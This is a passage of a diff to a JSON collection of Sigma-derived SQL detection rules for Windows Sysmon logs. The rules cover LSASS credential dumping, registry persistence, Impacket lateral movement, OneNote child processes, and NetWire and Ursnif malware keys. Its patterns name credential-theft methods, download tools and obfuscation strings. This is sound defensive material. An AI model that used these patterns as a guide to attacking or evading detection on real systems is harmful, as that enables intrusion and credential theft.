'\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" }, { - "title": "Use of VisualUiaVerifyNative.exe", - "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], 
"falsepositives": [ - "Legitimate testing of Microsoft UI parts." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "status": "test", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE 
'\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "PUA - Sysinternals Tools Execution - Registry", + "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of SysInternals tools. 
Filter the legitimate paths used in your environnement" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", + "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects COM object hijacking via TreatAs subkey", + "author": "Kutepov Anton, 
oscd.community", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1546.015" + ], + "falsepositives": [ + "Maybe some system utilities in rare cases use linking keys for backward compatibility" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + ], + "filename": "registry_add_persistence_com_key_linking.yml" + }, + { + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", + "tags": [ + "attack.execution", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE 
'\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. 
This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND 
CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Suspicious Rundll32 Setupapi.dll Activity", - "id": "285b85b1-a555-4095-8652-a8a4106af63f", - "status": "test", - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Potential Persistence Via Disk Cleanup Handler - Registry", + "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. 
It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence" ], "falsepositives": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + "Legitimate new entry added by windows" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program 
Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" + "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", + "id": "480421f9-417f-4d3b-9552-fd2728443ec8", "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal 
casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE 
